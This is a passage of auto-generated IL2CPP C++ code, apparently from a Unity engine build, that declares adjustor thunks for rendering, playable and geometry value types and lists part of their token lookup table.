extern void RenderTargetIdentifier_Equals_m859988BBC3D58D5C2AEA18C2CCCAF7009A5499D9_AdjustorThunk (void);
extern void RenderTargetIdentifier_Equals_m07E36F91E8966A0E3882EF168F1AE3656BE48E9A_AdjustorThunk (void);
extern void SphericalHarmonicsL2_get_Item_m4B9EF62E01AA7FD8A5DEB222618CDA17A7AE5901_AdjustorThunk (void);
extern void SphericalHarmonicsL2_GetHashCode_m6683A29826BFE74740D3CF28227E5C6FC8E6955E_AdjustorThunk (void);
extern void SphericalHarmonicsL2_Equals_m6B04A0E2E26885F766658AA1A2B0BD2499AA82C6_AdjustorThunk (void);
extern void SphericalHarmonicsL2_Equals_mA22783D26BEE236A8CA5425305D6772CEA6CCBC8_AdjustorThunk (void);
extern void BatchCullingContext__ctor_m4E95A80E46EB29A21AB9AD64C2D1CC5891281449_AdjustorThunk (void);
extern void LODParameters_Equals_mAD45601A9E881620B23A7922D8AA5AFBC91E0B9F_AdjustorThunk (void);
extern void LODParameters_Equals_mF956A067D82497A00AC8234322CD848E6FB7BADE_AdjustorThunk (void);
extern void LODParameters_GetHashCode_mECFCEAAAC935759A99C30C69BBC99A1148F46F40_AdjustorThunk (void);
extern void ScriptableRenderContext_GetCameras_Internal_m852016B3544E3ED5FEFB9695EC175622A5B6A8C8_AdjustorThunk (void);
extern void ScriptableRenderContext__ctor_m10159F14BB69F555C375E13BB77A1898FDB42FA5_AdjustorThunk (void);
extern void ScriptableRenderContext_GetCameras_m9B2329F79132EE49B719560AD739FD3601C44189_AdjustorThunk (void);
extern void ScriptableRenderContext_Equals_mBFDA5815F2B6ABA9B16503DA906B8BA42078718D_AdjustorThunk (void);
extern void ScriptableRenderContext_Equals_m99E5A233945DFC3B9A786F2413ECE68E5019AB88_AdjustorThunk (void);
extern void ScriptableRenderContext_GetHashCode_mA1EE09239F1ACFC29A2ADB027D5E76E690510207_AdjustorThunk (void);
extern void ShaderTagId__ctor_m4191968F1D2CE19F9092253EC10F83734A9CFF5B_AdjustorThunk (void);
extern void ShaderTagId_Equals_m02826F7AFC63AA3AE5DB14F7A891F8F173FD9A33_AdjustorThunk (void);
extern void ShaderTagId_Equals_m932EFCC38C276EEB2784BBC866330F4C595F52E0_AdjustorThunk (void);
extern void ShaderTagId_GetHashCode_mF5E3A1F96CBDFDCEFABE1B56125EBBA6E3B9EFEF_AdjustorThunk (void);
extern void StencilState_set_enabled_m6DC861C699D1044E896E833D2DAE69B82F796564_AdjustorThunk (void);
extern void StencilState_set_readMask_m1BA8F9033413889D4E77DA343DC0029566A9BB9B_AdjustorThunk (void);
extern void StencilState_set_writeMask_m94471C671E03D42F36DA61436B1068B362375D65_AdjustorThunk (void);
extern void StencilState_set_compareFunctionFront_m1388C37901DAB6AF9D23C0F01946DCCE19BC9BFC_AdjustorThunk (void);
extern void StencilState_set_passOperationFront_m1F15CC29366DAEAA6CCE1DB0622C70D6ECC5A3EB_AdjustorThunk (void);
extern void StencilState_set_failOperationFront_mADCECAE5D2E75ABAE51650F1F314E661D09C2CD6_AdjustorThunk (void);
extern void StencilState_set_zFailOperationFront_mC7D8F0A08B9AEC4203BD6B352CB795E8011EFBB6_AdjustorThunk (void);
extern void StencilState_set_compareFunctionBack_m8AF73F4E8FC95A46D33E3192C50702D2AA15D61D_AdjustorThunk (void);
extern void StencilState_set_passOperationBack_m4B1395FE21F5B5C809DC6F31D5824A90E05ED220_AdjustorThunk (void);
extern void StencilState_set_failOperationBack_mD279271DD1F99EE5B8BC19F5AE60988E6C6F0E4A_AdjustorThunk (void);
extern void StencilState_set_zFailOperationBack_mC092ABD8A5EA87245640A10E54C6A1990C4F6864_AdjustorThunk (void);
extern void StencilState_Equals_m9FFB8A41D8838FD128875CB2D4DAA760C6DF1051_AdjustorThunk (void);
extern void StencilState_Equals_mEA45A5D2BF2223B15EE0FB8BCEDBA9CB534ADF4B_AdjustorThunk (void);
extern void StencilState_GetHashCode_mB4A02DEE780377C853D16FFF49CCB9D9F4F711A5_AdjustorThunk (void);
extern void FrameData_HasFlags_m268F3C0E03481E2F7217CEB6153C072AB0A68C1C_AdjustorThunk (void);
extern void FrameData_get_deltaTime_m522E00CB1B4DA759A5121778A7688DA07735C1F8_AdjustorThunk (void);
extern void FrameData_get_effectiveSpeed_m49D7C9FB90C9B640B64D701B026DC26540BC25B9_AdjustorThunk (void);
extern void FrameData_get_evaluationType_m0212C6B9A3C3AD09BA24DD4291A9FB528BFD0842_AdjustorThunk (void);
extern void FrameData_get_seekOccurred_mC8325617A69EA31B70169D921E258AC60B2750D2_AdjustorThunk (void);
extern void FrameData_get_timeLooped_m88F002C13ED791E65D9F5705AAD05C19C505918B_AdjustorThunk (void);
extern void FrameData_get_timeHeld_m1213876DD47660CEA565831282ACA4477BC6644F_AdjustorThunk (void);
extern void FrameData_get_output_mB5B10130E39676C78F53E6194390B01B87D54FBF_AdjustorThunk (void);
extern void FrameData_get_effectivePlayState_m58201D8BB3B3489399055AC4D1264007552F2BAB_AdjustorThunk (void);
extern void FrameRate_get_dropFrame_mC8BFEB9E9E33328497040C4D02EAF1F0DC84AFF4_AdjustorThunk (void);
extern void FrameRate_get_rate_mF21BC02932E30CCC1832FE1B3C08FE6679F95406_AdjustorThunk (void);
extern void FrameRate__ctor_m9DF0B1521A85AE2CD542C19C1C253301B389CA71_AdjustorThunk (void);
extern void FrameRate_IsValid_m8F983C71BC91E1AEF857517C4D344D9FCEAE2851_AdjustorThunk (void);
extern void FrameRate_Equals_m71B1BAAEDC9E1096965764135FF45A1C464639E6_AdjustorThunk (void);
extern void FrameRate_Equals_m318AFC57E72479688AFA71ECFCB8F2113BC0044C_AdjustorThunk (void);
extern void FrameRate_GetHashCode_mD760D080786680B77E3E8F059950F48EAAF6A819_AdjustorThunk (void);
extern void FrameRate_ToString_m899E2A85E7CE55B74522F23706508BD4AF18934F_AdjustorThunk (void);
extern void FrameRate_ToString_m72358F5840A02CA9E1B5F326575596E2B094BB56_AdjustorThunk (void);
extern void Playable__ctor_mD2EB35E024816AEED68795D0124EAB30E05BF6C4_AdjustorThunk (void);
extern void Playable_GetHandle_m39356D23E849DC5428B262092657662C064E04F8_AdjustorThunk (void);
extern void Playable_GetPlayableType_mF7103BE376DCD61F54669681AE7BB7D6963D6D43_AdjustorThunk (void);
extern void Playable_Equals_mD72D3DB892B8867A0E7BAC032A16C08616EEFF86_AdjustorThunk (void);
extern void PlayableBinding_get_sourceObject_m195E6C4C3DF88BD89A2DE3923646B9A013310C09_AdjustorThunk (void);
extern void PlayableBinding_CreateOutput_mE29B8B4AE0857C038D6DCA6824A307C60E2DD7C6_AdjustorThunk (void);
extern void PlayableGraph_GetRootPlayable_m3BA0011AD6B13FCE5D58EA3E9BB17BE84319B53C_AdjustorThunk (void);
extern void PlayableGraph_Evaluate_m5E8756A5AB34EB7F9FC7682932D4BD6BE418352A_AdjustorThunk (void);
extern void PlayableGraph_IsValid_mB608FD2CEDAA27C31C34DF4639CF98199ECDC3CA_AdjustorThunk (void);
extern void PlayableGraph_IsPlaying_m9289A7D3CBD3A73051568C20F384C1D4FBBA89E0_AdjustorThunk (void);
extern void PlayableGraph_Evaluate_m56DAAF530D0A6079FCBCFE86EF5E3E33374A22A7_AdjustorThunk (void);
extern void PlayableGraph_GetResolver_m7869599485E96C9D09E0680FA25099E9B2789A47_AdjustorThunk (void);
extern void PlayableGraph_GetPlayableCount_m69E1448E840367C9A1D05BE0FB1908BD0C04B809_AdjustorThunk (void);
extern void PlayableGraph_GetRootPlayableCount_mAD4CB33AEDB21181CAE1312C3D23CA14E52FFA45_AdjustorThunk (void);
extern void PlayableGraph_SynchronizeEvaluation_m9911E65EE4FE46BAE375EF11C884136C840760C0_AdjustorThunk (void);
extern void PlayableGraph_CreatePlayableHandle_mF90D606A614FB603DBFFE4E87C325F8CC59BED67_AdjustorThunk (void);
extern void PlayableGraph_CreateScriptOutputInternal_m7B8A726419E5A7E5C07436BC168CE28B2D970393_AdjustorThunk (void);
extern void PlayableGraph_GetRootPlayableInternal_mB01EE3DE1FED4EB160B5EA367448521ED0F36165_AdjustorThunk (void);
extern void PlayableGraph_IsMatchFrameRateEnabled_mC6D005B2F581E49DEA0037C8811CEA771C3CE1C3_AdjustorThunk (void);
extern void PlayableGraph_GetFrameRate_m81DF8FC361E09CC2A2FE2350E48FF2B1E4AFA990_AdjustorThunk (void);
extern void PlayableGraph_ConnectInternal_m86DBDCCD0D8D5B1734EA7E90268F057A6E52525A_AdjustorThunk (void);
extern void PlayableHandle_GetInput_m3F42E2CF0D7DFA2396295133D02622C1BE3A8633_AdjustorThunk (void);
extern void PlayableHandle_SetInputWeight_m8647C2593A24870E429A0832FC26EE2241CC302E_AdjustorThunk (void);
extern void PlayableHandle_GetInputWeight_m0C5D7A870D6DDE9F1A5193907ADCA0335DC6207A_AdjustorThunk (void);
extern void PlayableHandle_Equals_m60AD76B7D38CA989AE84501B2E9F9ED5CB5F9670_AdjustorThunk (void);
extern void PlayableHandle_Equals_m81BA0E127133DFF3E45DA61D185FDF48E16BCF45_AdjustorThunk (void);
extern void PlayableHandle_GetHashCode_m10FB32ECDC0B9D7BDAEA9E3B76BDDF4614F4EF4F_AdjustorThunk (void);
extern void PlayableHandle_CheckInputBounds_m5A5D02E53EF84B63F75DBB414906923677EED1E3_AdjustorThunk (void);
extern void PlayableHandle_CheckInputBounds_mEA09337758C333586D6B7B4A5D1E10852ECFC1D8_AdjustorThunk (void);
extern void PlayableHandle_IsValid_m07631D12846BAAF2CC302E69A28A44BFE9EB5098_AdjustorThunk (void);
extern void PlayableHandle_GetPlayableType_mD9750F1B85DF086F52641D6AB85789601486B686_AdjustorThunk (void);
extern void PlayableHandle_SetScriptInstance_m479F7C03A25E77284BE1949CF5EABE903B9B26EE_AdjustorThunk (void);
extern void PlayableHandle_GetPlayState_m14547B804BB9B9B9E2B20B3F0975334CC99E778F_AdjustorThunk (void);
extern void PlayableHandle_Play_m1EF8E1105EB6A4A9B0D6638A57CDCBCEEDC6FB2D_AdjustorThunk (void);
extern void PlayableHandle_Pause_m75833A31BA17AC8900736C6F5AC778D033001B32_AdjustorThunk (void);
extern void PlayableHandle_SetSpeed_m39D426AE0DF93F876C2C1EDF9417C11B97A305E9_AdjustorThunk (void);
extern void PlayableHandle_GetTime_m27CB24B86EF0E6A4BD2C53907A677059B5D2BD5D_AdjustorThunk (void);
extern void PlayableHandle_SetTime_m6D255AB6779F3DC278813F1C016FE4EBC9F4B1E4_AdjustorThunk (void);
extern void PlayableHandle_IsDone_mF5DAB54F941BC13799577396526E3901CF639DE6_AdjustorThunk (void);
extern void PlayableHandle_GetDuration_mE3CF9C12CA5A186288A7F1981A92F043100E02A7_AdjustorThunk (void);
extern void PlayableHandle_SetDuration_m4E07F9F3A90B2F3CE10325D9F405993F03CCA08B_AdjustorThunk (void);
extern void PlayableHandle_SetPropagateSetTime_mD1458DFF49EF07D73884A9BBAC31358579C8931B_AdjustorThunk (void);
extern void PlayableHandle_GetGraph_m03AFC9F0B66AC13A120EC37F6964200C9973CE24_AdjustorThunk (void);
extern void PlayableHandle_GetInputCount_m7FE60883E4B7C9AF7D39F28A044924ADBD5E5121_AdjustorThunk (void);
extern void PlayableHandle_SetInputCount_m6067CD3616C428F777903FCBFD789060A2185DEE_AdjustorThunk (void);
extern void PlayableHandle_SetInputWeight_mCC570E6D826D79987CC4E021DA9E7C0B700C0AC1_AdjustorThunk (void);
extern void PlayableHandle_GetPreviousTime_m0C6881E900DF5FE7281699876DFE48BA64DEC1BF_AdjustorThunk (void);
extern void PlayableHandle_SetTraversalMode_m5302D6FC1935F2EF97E25DF58B402CC8700DE03D_AdjustorThunk (void);
extern void PlayableHandle_GetTimeWrapMode_m3C4CF421B7470E04537C45092DA9A1D242A5D1B4_AdjustorThunk (void);
extern void PlayableHandle_SetTimeWrapMode_m88B50CE0AABE0183BBF12ACEC5E84CBEDAB76C2F_AdjustorThunk (void);
extern void PlayableHandle_GetScriptInstance_m14D182ED7BEB2AAE1ADD86189A687FF0F86FA925_AdjustorThunk (void);
extern void PlayableHandle_GetInputHandle_mB9DAEF700C72515D7CA640F71C51A09C08DAD380_AdjustorThunk (void);
extern void PlayableHandle_SetInputWeightFromIndex_mF56AA0C0055C18FF46EF8E315331FDF45D832752_AdjustorThunk (void);
extern void PlayableHandle_GetInputWeightFromIndex_mF50333BE4F3BD48CCF6A431BC6B99D4CBF131CD6_AdjustorThunk (void);
extern void PlayableOutput__ctor_m55FBB20EC479F67641835EA48D84A1AB3DF39747_AdjustorThunk (void);
extern void PlayableOutput_GetHandle_m12FF2889D15884CBEB92A6CB376827EBA5A607BF_AdjustorThunk (void);
extern void PlayableOutput_Equals_m4CC730818751114DC5643600B5FE20243F4B7121_AdjustorThunk (void);
extern void PlayableOutputHandle_GetHashCode_mC2FAF756D71026E3AF4492157EDAE7186429B079_AdjustorThunk (void);
extern void PlayableOutputHandle_Equals_mB9106CB9333E0BF4C893E43AD7A23B64471CC21A_AdjustorThunk (void);
extern void PlayableOutputHandle_Equals_mF5C23882B2A007186F00EB3D23E9BD6664E8DAE6_AdjustorThunk (void);
extern void PlayableOutputHandle_IsValid_mA94C343D72B72C3B1C7636C93A8DB5EA71691312_AdjustorThunk (void);
extern void PlayableOutputHandle_GetPlayableOutputType_m5FA19BC37FD64EC6C2174B6DA6CB202F5451C108_AdjustorThunk (void);
extern void PlayableOutputHandle_SetReferenceObject_m898B8810539BBD3B4B4382CD436FE84EC60AF77F_AdjustorThunk (void);
extern void PlayableOutputHandle_SetUserData_m23E8BB63D93E67DD981C9045D610C6B2289F435B_AdjustorThunk (void);
extern void PlayableOutputHandle_GetSourcePlayable_m6D142AAB19E92AAD5D7C4F96087F27B0F8185627_AdjustorThunk (void);
extern void PlayableOutputHandle_SetSourcePlayable_mBC96BBEB1838444B937337B985FFD9A6084A6A8D_AdjustorThunk (void);
extern void PlayableOutputHandle_GetSourceOutputPort_m9E9AA2A0E62DFBA3570DC262AFECD08FF0E71D1F_AdjustorThunk (void);
extern void PlayableOutputHandle_SetWeight_m6A8B44B22EFA5628A90A87085FD86D478913093F_AdjustorThunk (void);
extern void PlayableOutputHandle_PushNotification_m97131909E6A9A76742074B4023CA6C94A2A95610_AdjustorThunk (void);
extern void PlayableOutputHandle_AddNotificationReceiver_m2E93B0DB0A7A98AECFDAEB02D610B45617FC357C_AdjustorThunk (void);
extern void ScriptPlayableOutput__ctor_m867BA54A9DCDFCA187EA927F75A6903D0F8FF2C4_AdjustorThunk (void);
extern void ScriptPlayableOutput_GetHandle_m21A3E97125928298D6942D0EDE58ADAD018E4E93_AdjustorThunk (void);
extern void LinearColor_get_red_m376617B8E3156420835055189BB28D953FE46A2A_AdjustorThunk (void);
extern void LinearColor_set_red_m0ACFCEDDD205A6F235BE95936816E92898B01B52_AdjustorThunk (void);
extern void LinearColor_get_green_mCCE90A662234EE3605368F3AEC14E51572665AE5_AdjustorThunk (void);
extern void LinearColor_set_green_mBD9C7EA6415DC54B3F6B643C3CD02B71565F0694_AdjustorThunk (void);
extern void LinearColor_get_blue_mAFAEA5D5590DD14CFC48BC18DF4BFEBBDCB0A99A_AdjustorThunk (void);
extern void LinearColor_set_blue_m3FEEAF946772BB177733B67D9DA4B72D84874375_AdjustorThunk (void);
extern void LightDataGI_Init_m112DEBB76EC57AC52E6384C97A3E8B2EAA867207_AdjustorThunk (void);
extern void LightDataGI_Init_mACE06E00CC639CA89F3847E9DB55FD0F00812A7A_AdjustorThunk (void);
extern void LightDataGI_Init_m0A999D118CDCBDA99B9E24231ED057D943C9C67B_AdjustorThunk (void);
extern void LightDataGI_Init_mDC887CA8191C6CADE1DB585D7FEB46B080B25038_AdjustorThunk (void);
extern void LightDataGI_Init_mB2D1C73EDFEA6815E39A0FE3ED2F7BF9A7117632_AdjustorThunk (void);
extern void LightDataGI_InitNoBake_mBDF2EFB22D4BEE63B6F25F4EE9F1522D2866ED43_AdjustorThunk (void);
extern void CameraPlayable_GetHandle_mA04469CA50B43AF6219F9967B8AEB310CB5455BD_AdjustorThunk (void);
extern void CameraPlayable_Equals_mD0FA195F3EA6511043E8F0AA1680CEB7E0E2E2CF_AdjustorThunk (void);
extern void MaterialEffectPlayable_GetHandle_m748319E116317E9ADD1EA36A4EDA488338471058_AdjustorThunk (void);
extern void MaterialEffectPlayable_Equals_mC55640B5D29F90360F9743549FABD43C5AA320EC_AdjustorThunk (void);
extern void TextureMixerPlayable_GetHandle_mB75CF651C6BDDF347ED6938D0F1DE4BED92BB7CD_AdjustorThunk (void);
extern void TextureMixerPlayable_Equals_m6838329B39779020FC3309B7406B8A0418F44FE7_AdjustorThunk (void);
extern void TexturePlayableOutput_GetHandle_m482C2E6F3FB849142FA7936B1B6A0B9B072A1899_AdjustorThunk (void);
static Il2CppTokenAdjustorThunkPair s_adjustorThunks[408] =
{
{ 0x06000009, ProfilerMarker__ctor_mDD68B0A8B71E0301F592AF8891560150E55699C8_AdjustorThunk },
{ 0x0600000A, ProfilerMarker_Auto_m133FA724EB95D16187B37D2C8A501D7E989B1F8D_AdjustorThunk },
{ 0x0600000B, AutoScope__ctor_m7F63A273E382CB6328736B6E7F321DDFA40EA9E3_AdjustorThunk },
{ 0x0600000C, AutoScope_Dispose_mED763F3F51261EF8FB79DB32CD06E0A3F6C40481_AdjustorThunk },
{ 0x0600001C, JobHandle_Complete_mDCED35A125AAB37EDDAB2E31C805B4904B614A4A_AdjustorThunk },
{ 0x0600001D, JobHandle_get_IsCompleted_m834D40CA77C5F2EC575592BD5DEB60B66ACCF941_AdjustorThunk },
{ 0x0600002F, JobScheduleParameters__ctor_m5FFED3B28A1FA2C3EC7D1C50A7D7E788C411CE04_AdjustorThunk },
{ 0x0600008B, Keyframe__ctor_mECF144086B28785BE911A22C06194A9E0FBF3C34_AdjustorThunk },
{ 0x0600008C, Keyframe__ctor_m0E7D85642F12A3DAFA1768351CC7670648C41AB2_AdjustorThunk },
{ 0x0600008D, Keyframe_get_time_mB8886F64CBB373936C0C25C4C68397C05779F661_AdjustorThunk },
{ 0x0600008E, Keyframe_set_time_m98F165193486C0DF1611B562016595B18052A2D6_AdjustorThunk },
{ 0x0600008F, Keyframe_get_value_m53E6B7609086AAAA46E24BAF734EF08E16A3FD6C_AdjustorThunk },
{ 0x06000090, Keyframe_set_value_m396D6040A4AB72ED5B9797E8C92DD806FA6F5431_AdjustorThunk },
{ 0x06000091, Keyframe_set_inTangent_m4CBBDDEE23D6E1E498580A6E1C2661E57CD38363_AdjustorThunk },
{ 0x06000092, Keyframe_set_outTangent_m68F2F86E292344CAB2600787D244019B95A89DFE_AdjustorThunk },
{ 0x06000104, BoundingSphere__ctor_mB76812ECBDD8BA5B3E246871C58F6FA6CA2061C7_AdjustorThunk },
{ 0x06000130, Bounds__ctor_mAF7B238B9FBF90C495E5D7951760085A93119C5A_AdjustorThunk },
{ 0x06000131, Bounds_GetHashCode_m59C79B529D33866FE45FEFC0C69FBD3B4AC7E172_AdjustorThunk },
{ 0x06000132, Bounds_Equals_m93E0B9D24C73E57A6FABB9D312101D48183C88CC_AdjustorThunk },
{ 0x06000133, Bounds_Equals_m615135524315743D29633C33B6C8B16B754266DB_AdjustorThunk },
{ 0x06000134, Bounds_get_center_m5B05F81CB835EB6DD8628FDA24B638F477984DC3_AdjustorThunk },
{ 0x06000135, Bounds_set_center_m891869DD5B1BEEE2D17907BBFB7EB79AAE44884B_AdjustorThunk },
{ 0x06000136, Bounds_get_size_m0699A53A55A78B3201D7270D6F338DFA91B6FAD4_AdjustorThunk },
{ 0x06000137, Bounds_set_size_m950CFB68CDD1BF409E770509A38B958E1AE68128_AdjustorThunk },
{ 0x06000138, Bounds_get_extents_mFE6DC407FCE2341BE2C750CB554055D211281D25_AdjustorThunk },
{ 0x06000139, Bounds_set_extents_m09496358547B86A93EFE7BE6371E7A6FE937C46F_AdjustorThunk },
{ 0x0600013A, Bounds_get_min_m465AC9BBE1DE5D8E8AD95AC19B9899068FEEBB13_AdjustorThunk },
{ 0x0600013B, Bounds_get_max_m6446F2AB97C1E57CA89467B9DE52D4EB61F1CB09_AdjustorThunk },
{ 0x0600013E, Bounds_SetMinMax_mB5F7DDF18EDB7F3F25FA6D2B36824F28978C540F_AdjustorThunk },
{ 0x0600013F, Bounds_Encapsulate_m1FCA57C58536ADB67B85A703470C6F5BFB837C2F_AdjustorThunk },
{ 0x06000140, Bounds_Encapsulate_m7C70C382B9380A8C962074C78E189B53CE8F7A22_AdjustorThunk },
{ 0x06000141, Bounds_ToString_m1BCCCC8C6455A77DE5C964968C33305EF7A4A0D2_AdjustorThunk },
{ 0x06000142, Bounds_ToString_m085531A8E800327829FCD48DEA671A4A0B8D21CA_AdjustorThunk },
{ 0x06000143, Plane_get_normal_mA161D94E6F7327BC111007C880B76E1731729EFB_AdjustorThunk },
{ 0x06000144, Plane__ctor_m2BFB65EBFF51123791878684ECC375B99FAD10A2_AdjustorThunk },
{ 0x06000145, Plane_Raycast_mC6D25A732413A2694A75CB0F2F9E75DEDDA117F0_AdjustorThunk },
{ 0x06000146, Plane_ToString_mF0A98DAF2E4FA36A98B68F015A4DE507D8BB3B5A_AdjustorThunk },
{ 0x06000147, Plane_ToString_mE12B74C757E52A84BE921DF2E758A36E97A11DDA_AdjustorThunk },
{ 0x06000148, Ray__ctor_mE298992FD10A3894C38373198385F345C58BD64C_AdjustorThunk },
{ 0x06000149, Ray_get_origin_m97604A8F180316A410DCD77B7D74D04522FA1BA6_AdjustorThunk },
{ 0x0600014A, Ray_get_direction_m21C2D22D3BD4A683BD4DC191AB22DD05F5EC2086_AdjustorThunk },
{ 0x0600014B, Ray_GetPoint_mAF4E1D38026156E6434EF2BED2420ED5236392AF_AdjustorThunk },
{ 0x0600014C, Ray_ToString_m06274331D92120539B4C6E0D3747EE620DB468E5_AdjustorThunk },
{ 0x0600014D, Ray_ToString_mA76F7B86876505F674F3E20C18C8258103622C10_AdjustorThunk },
{ 0x0600014E, Rect__ctor_m18C3033D135097BEE424AAA68D91C706D2647F23_AdjustorThunk },
{ 0x0600014F, Rect__ctor_m503705FE0E4E413041E3CE7F09270489F401C675_AdjustorThunk },
{ 0x06000150, Rect__ctor_m5665723DD0443E990EA203A54451B2BB324D8224_AdjustorThunk },
{ 0x06000153, Rect_get_x_mB267B718E0D067F2BAE31BA477647FBF964916EB_AdjustorThunk },
{ 0x06000154, Rect_set_x_mAB91AB71898A20762BC66FD0723C4C739C4C3406_AdjustorThunk },
{ 0x06000155, Rect_get_y_mC733E8D49F3CE21B2A3D40A1B72D687F22C97F49_AdjustorThunk },
{ 0x06000156, Rect_set_y_mDE91F4B98A6E8623EFB1250FF6526D5DB5855629_AdjustorThunk },
{ 0x06000157, Rect_get_position_m9B7E583E67443B6F4280A676E644BB0B9E7C4E38_AdjustorThunk },
{ 0x06000158, Rect_set_position_m9CD8AA25A83A7A893429C0ED56C36641202C3F05_AdjustorThunk },
{ 0x06000159, Rect_get_center_mAA9A2E1F058B2C9F58E13CC4822F789F42975E5C_AdjustorThunk },
{ 0x0600015A, Rect_set_center_m1BFC7584EEE9EF6C9AC2CA8459300FE23D5CE86F_AdjustorThunk },
{ 0x0600015B, Rect_get_min_mD0D1BABF9C955D2D9CCA86E257B0783ACDEE69AC_AdjustorThunk },
{ 0x0600015C, Rect_set_min_m6557D7D73C6F115CA7C92E38C88EA9E95FC89253_AdjustorThunk },
{ 0x0600015D, Rect_get_max_m60149158D9A01113214BB417AA48CEF774899167_AdjustorThunk },
{ 0x0600015E, Rect_set_max_mAD2D6D5DC1F5A6E69A0A0BD7E34C209F91C381F0_AdjustorThunk },
{ 0x0600015F, Rect_get_width_m620D67551372073C9C32C4C4624C2A5713F7F9A9_AdjustorThunk },
{ 0x06000160, Rect_set_width_m93B6217CF3EFF89F9B0C81F34D7345DE90B93E5A_AdjustorThunk },
{ 0x06000161, Rect_get_height_mE1AA6C6C725CCD2D317BD2157396D3CF7D47C9D8_AdjustorThunk },
{ 0x06000162, Rect_set_height_mD00038E6E06637137A5626CA8CD421924005BF03_AdjustorThunk },
{ 0x06000163, Rect_get_size_mFB990FFC0FE0152179C8C74A59E4AC258CB44267_AdjustorThunk },
{ 0x06000164, Rect_set_size_m346E4F7077E5A1C0F4E21966232CD726CB9E6BAA_AdjustorThunk },
{ 0x06000165, Rect_get_xMin_mE89C40702926D016A633399E20DB9501E251630D_AdjustorThunk },
{ 0x06000166, Rect_set_xMin_mA873FCFAF9EABA46A026B73CA045192DF1946F19_AdjustorThunk },
{ 0x06000167, Rect_get_yMin_mB19848FB25DE61EDF958F7A22CFDD86DE103062F_AdjustorThunk },
{ 0x06000168, Rect_set_yMin_m9F780E509B9215A9E5826178CF664BD0E486D4EE_AdjustorThunk },
{ 0x06000169, Rect_get_xMax_m2339C7D2FCDA98A9B007F815F6E2059BA6BE425F_AdjustorThunk },
{ 0x0600016A, Rect_set_xMax_m97C28D468455A6D19325D0D862E80A093240D49D_AdjustorThunk },
{ 0x0600016B, Rect_get_yMax_mBC37BEE1CD632AADD8B9EAF9FE3BA143F79CAF8E_AdjustorThunk },
{ 0x0600016C, Rect_set_yMax_mCF452040E0068A4B3CB15994C0B4B6AD4D78E04B_AdjustorThunk },
{ 0x0600016D, Rect_Contains_mAB270D6B7E3B0009A50D142C569D63E8FE59F48B_AdjustorThunk },
{ 0x0600016E, Rect_Contains_mB1160CD465F3E9616AA4EED72AFFD611BD8D2B6B_AdjustorThunk },
{ 0x06000170, Rect_Overlaps_m5A540A24DAD3327006A3A2E209CC17992173B572_AdjustorThunk },
{ 0x06000171, Rect_Overlaps_m3F0BA2C8BB81491978B21EB21C8A6D3BBED02E41_AdjustorThunk },
{ 0x06000174, Rect_GetHashCode_m8E55539476EA6B7A6E0CEC5F980227CD15B778F1_AdjustorThunk },
{ 0x06000175, Rect_Equals_mD7EB2046512E4A46524A7ED929F1C38A32C408F8_AdjustorThunk },
{ 0x06000176, Rect_Equals_mE725DE506D3F1DB92F58B876BDA42AACD4D991B5_AdjustorThunk },
{ 0x06000177, Rect_ToString_m7BF74645745862DA4751965D0899F94376F77F10_AdjustorThunk },
{ 0x06000178, Rect_ToString_mA9EB8EC6A2E940240E0D0ECFA103B9B7EFB3D532_AdjustorThunk },
{ 0x06000179, RectInt_get_x_mA1E7EF6DEAD2E900D7D56B7A3957C05081EBA9CA_AdjustorThunk },
{ 0x0600017A, RectInt_set_x_m2D2F3A87E9899A29444DBDD0BB11CB19F13AA075_AdjustorThunk },
{ 0x0600017B, RectInt_get_y_m440422264E6FCAA91E01F81486A78037AC29D878_AdjustorThunk },
{ 0x0600017C, RectInt_set_y_m45D5C1D817698266BED66D41A705956A1571858D_AdjustorThunk },
{ 0x0600017D, RectInt_get_width_m6B7B2FB764EAE83B7F63E7F77FA33973606761A7_AdjustorThunk },
{ 0x0600017E, RectInt_set_width_mCD96AA9D096114147F8411A340CE4AD3476DCD4C_AdjustorThunk },
{ 0x0600017F, RectInt_get_height_mE25FB938714942D7A3BA0B3C21BC5CB913D5709C_AdjustorThunk },
{ 0x06000180, RectInt_set_height_m823A353A80B8B5180AEDF968A6E85B9D9B75C1C6_AdjustorThunk },
{ 0x06000181, RectInt_get_xMin_mA5FB5AF1133380E080CF750D21327DE27EADEE1B_AdjustorThunk },
{ 0x06000182, RectInt_get_yMin_m6914C2254158DF797E20E381626DC08A2700147B_AdjustorThunk },
{ 0x06000183, RectInt_get_xMax_mBA05CE52847E3D3CB8295055706B3E0D4350E9F0_AdjustorThunk },
{ 0x06000184, RectInt_get_yMax_mAE5D758A1241F7722F8FB9B46861583F76C8FE44_AdjustorThunk },
{ 0x06000185, RectInt__ctor_m6E8B3A6C7EE11257A6B438E36274116FE39B5B42_AdjustorThunk },
{ 0x06000186, RectInt_Overlaps_m9E82E1C8BFDA3297221E5FDC8B8773AD3F50C4EE_AdjustorThunk },
{ 0x06000187, RectInt_ToString_m7EC8BB4830459B8CF5BF3032E9A526A6EE18D386_AdjustorThunk },
{ 0x06000188, RectInt_ToString_m7EAE8CA8D77B7D6DDD46B61D670C71046006B92F_AdjustorThunk },
{ 0x06000189, RectInt_Equals_mE9EA164664CA30C1C099EFB658D691F55A793B96_AdjustorThunk },
{ 0x060001EF, Resolution_ToString_m058CE120CC83F314D0C8D4A706F9AA068BC9CF34_AdjustorThunk },
{ 0x06000364, RenderTextureDescriptor_get_width_mB159E4EB08B23B19CCCFADB465864361FB840BFF_AdjustorThunk },
{ 0x06000365, RenderTextureDescriptor_set_width_m3B2494007BFE3AD4D14403407C9B24F5045E7E10_AdjustorThunk },
{ 0x06000366, RenderTextureDescriptor_get_height_m1006F9AA45029715C552C8A8C2F102F63D3A91EC_AdjustorThunk },
{ 0x06000367, RenderTextureDescriptor_set_height_m1FE41111472DAA9B5E80FFAF3445004D72A3CFA5_AdjustorThunk },
{ 0x06000368, RenderTextureDescriptor_get_msaaSamples_mFCC33643AFF2265C8305DCFD79ED8774A1A8FA22_AdjustorThunk },
{ 0x06000369, RenderTextureDescriptor_set_msaaSamples_m6910E09489372746391B14FBAF59A7237539D6C4_AdjustorThunk },
{ 0x0600036A, RenderTextureDescriptor_get_volumeDepth_m528818299E101F1B285B08BE12FAC2F9A871BA36_AdjustorThunk },
{ 0x0600036B, RenderTextureDescriptor_set_volumeDepth_mEF9610D1C14182417A01B7243DEE6B559A13B34D_AdjustorThunk },
{ 0x0600036C, RenderTextureDescriptor_set_mipCount_mDCC85ED7D97BD64A290A21DB91BC5CB1C4BA95EF_AdjustorThunk },
{ 0x0600036D, RenderTextureDescriptor_get_graphicsFormat_m50F25A4F179EA318C8D3B0D8685F9C5F59F7DEC0_AdjustorThunk },
